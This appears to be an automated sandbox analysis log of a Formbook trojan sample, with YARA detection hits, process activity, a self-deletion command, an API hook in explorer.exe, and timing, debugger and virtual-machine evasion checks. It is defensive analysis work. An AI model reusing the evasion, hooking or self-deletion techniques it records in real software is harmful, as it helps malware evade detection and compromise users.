              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2120646416.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000002.00000002.3315542504.00000000103BF000.00000004.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000000.2050850290.0000000000971000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3299919651.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000003.00000002.3300459185.0000000004140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000000.00000002.2119505783.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: Process Memory Space: jqPZZhDmjh.exe PID: 6964, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: Process Memory Space: raserver.exe PID: 2656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: jqPZZhDmjh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: jqPZZhDmjh.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.evad.winEXE@6/0@5/2
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
              Source: C:\Windows\explorer.exeFile read: C:\Program Files (x86)\desktop.ini
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: jqPZZhDmjh.exeReversingLabs: Detection: 89%
              Source: jqPZZhDmjh.exeVirustotal: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\jqPZZhDmjh.exe C:\Users\user\Desktop\jqPZZhDmjh.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
              Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\jqPZZhDmjh.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
              Source: jqPZZhDmjh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: wntdll.pdbUGP source: jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: jqPZZhDmjh.exe, jqPZZhDmjh.exe, 00000000.00000003.2053878549.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2051833702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.000000000171E000.00000040.00001000.00020000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, raserver.exe, 00000003.00000002.3300751404.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2120183024.00000000041F7000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300751404.000000000453E000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000003.00000003.2117914858.0000000004043000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: RAServer.pdb source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: RAServer.pdbGCTL source: jqPZZhDmjh.exe, 00000000.00000002.2120687232.0000000001920000.00000040.10000000.00040000.00000000.sdmp, jqPZZhDmjh.exe, 00000000.00000003.2117296757.0000000001060000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000003.00000002.3300330935.0000000000880000.00000040.80000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009869CB pushad ; retf 0_2_009869CC
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00977A0B push cs; retf 0_2_00977A0C
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D3A3 push ss; iretd 0_2_0098D3A6
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979BCC push es; iretd 0_2_00979BCE
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097E329 push eax; iretd 0_2_0097E32A
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4A5 push eax; ret 0_2_0098D4F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097B4C7 push edx; retf 0_2_0097B4CD
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4FB push eax; ret 0_2_0098D562
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D4F2 push eax; ret 0_2_0098D4F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00986C49 push ebp; retf 0_2_00986C56
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0098D55C push eax; ret 0_2_0098D562
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009866D8 push ebp; iretd 0_2_009866E5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_009877F3 push eax; iretd 0_2_00987802
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00977710 push edi; ret 0_2_00977711
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B09AD push ecx; mov dword ptr [esp], ecx0_2_015B09B6
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7F9B5 push esp; retn 0000h2_2_0DF7FAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7FB1E push esp; retn 0000h2_2_0DF7FB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF7FB02 push esp; retn 0000h2_2_0DF7FB03
              Source: C:\Windows\explorer.exeCode function: 2_2_0DF40000 push C649BDF0h; ret 2_2_0DF40005
              Source: C:\Windows\explorer.exeCode function: 2_2_1011F9B5 push esp; retn 0000h2_2_1011FAE7
              Source: C:\Windows\explorer.exeCode function: 2_2_1011FB1E push esp; retn 0000h2_2_1011FB1F
              Source: C:\Windows\explorer.exeCode function: 2_2_1011FB02 push esp; retn 0000h2_2_1011FB03
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A27FA pushad ; ret 3_2_043A27F9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A225F pushad ; ret 3_2_043A27F9
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043A283D push eax; iretd 3_2_043A2858
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_043D09AD push ecx; mov dword ptr [esp], ecx3_2_043D09B6
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004CE329 push eax; iretd 3_2_004CE32A
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D66D8 push ebp; iretd 3_2_004D66E5
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D69CB pushad ; retf 3_2_004D69CC
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004D6C49 push ebp; retf 3_2_004D6C56
              Source: C:\Windows\SysWOW64\raserver.exeCode function: 3_2_004DD3A3 push ss; iretd 3_2_004DD3A6
              Source: jqPZZhDmjh.exeStatic PE information: section name: .text entropy: 7.406763653212094

              Hooking and other Techniques for Hiding and Protection

              Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE5
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeRDTSC instruction interceptor: First address: 0000000000979904 second address: 000000000097990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeRDTSC instruction interceptor: First address: 0000000000979B6E second address: 0000000000979B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000004C9904 second address: 00000000004C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 00000000004C9B6E second address: 00000000004C9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979AA0 rdtsc 0_2_00979AA0
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8693
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1247
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866
              Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 1028
              Source: C:\Windows\SysWOW64\raserver.exeWindow / User API: threadDelayed 8946
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeAPI coverage: 1.7 %
              Source: C:\Windows\SysWOW64\raserver.exeAPI coverage: 1.8 %
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep count: 8693 > 30
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep time: -17386000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep count: 1247 > 30
              Source: C:\Windows\explorer.exe TID: 4916Thread sleep time: -2494000s >= -30000s
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep count: 1028 > 30
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep time: -2056000s >= -30000s
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep count: 8946 > 30
              Source: C:\Windows\SysWOW64\raserver.exe TID: 4036Thread sleep time: -17892000s >= -30000s
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
              Source: explorer.exe, 00000002.00000002.3304893437.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
              Source: explorer.exe, 00000002.00000000.2075170256.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 4'me#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
              Source: explorer.exe, 00000002.00000000.2073710031.000000000C424000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f56wP3
              Source: explorer.exe, 00000002.00000002.3304893437.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000002.3304893437.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
              Source: explorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: explorer.exe, 00000002.00000000.2056290643.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 00000002.00000000.2066913018.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_00979AA0 rdtsc 0_2_00979AA0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0097ACE0 LdrLoadDll,0_2_0097ACE0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015AC156 mov eax, dword ptr fs:[00000030h]0_2_015AC156
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684164 mov eax, dword ptr fs:[00000030h]0_2_01684164
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01684164 mov eax, dword ptr fs:[00000030h]0_2_01684164
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6154 mov eax, dword ptr fs:[00000030h]0_2_015B6154
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015B6154 mov eax, dword ptr fs:[00000030h]0_2_015B6154
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov ecx, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01644144 mov eax, dword ptr fs:[00000030h]0_2_01644144
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01648158 mov eax, dword ptr fs:[00000030h]0_2_01648158
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov eax, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165E10E mov ecx, dword ptr fs:[00000030h]0_2_0165E10E
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_01670115 mov eax, dword ptr fs:[00000030h]0_2_01670115
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E0124 mov eax, dword ptr fs:[00000030h]0_2_015E0124
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov ecx, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0165A118 mov eax, dword ptr fs:[00000030h]0_2_0165A118
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016861E5 mov eax, dword ptr fs:[00000030h]0_2_016861E5
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016761C3 mov eax, dword ptr fs:[00000030h]0_2_016761C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_016761C3 mov eax, dword ptr fs:[00000030h]0_2_016761C3
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_015E01F8 mov eax, dword ptr fs:[00000030h]0_2_015E01F8
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0162E1D0
              Source: C:\Users\user\Desktop\jqPZZhDmjh.exeCode function: 0_2_0162E1D0 mov eax, dword ptr fs:[00000030h]0_2_0162E1D0
